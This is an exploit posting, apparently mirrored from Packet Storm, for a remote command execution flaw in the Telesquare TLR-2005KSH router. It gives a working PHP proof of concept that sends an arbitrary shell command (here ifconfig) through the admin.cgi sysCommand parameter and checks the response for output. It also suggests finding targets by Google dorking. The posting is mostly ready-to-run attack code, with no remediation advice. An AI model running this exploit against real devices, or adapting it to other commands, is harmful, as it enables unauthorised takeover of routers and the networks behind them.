Share
## https://sploitus.com/exploit?id=PACKETSTORM:216016
=============================================================================================================================================
    | # Title     : Telesquare TLR-2005KSH - Remote Command Execution vulnerability                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : http://telesquare.co.kr/                                                                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Telesquare TLR-2005KSH Automated Control Vulnerability
    	
    [+] Payload : 
    
    [+] Set Target : line 5 + 7 .
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    $target_url = "http://<target>/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig"; 
    $headers = [
        "Host: <hostname>", 
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (strpos($response, '<CmdResult>') !== false && strpos($response, '</xml>') !== false && strpos($response, 'Ethernet') !== false && strpos($response, 'inet') !== false) {
        echo "The vulnerability was successfully exploited.\n";
        
    } else {
        echo "No exploitation of the vulnerability was detected.\n";
    }
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================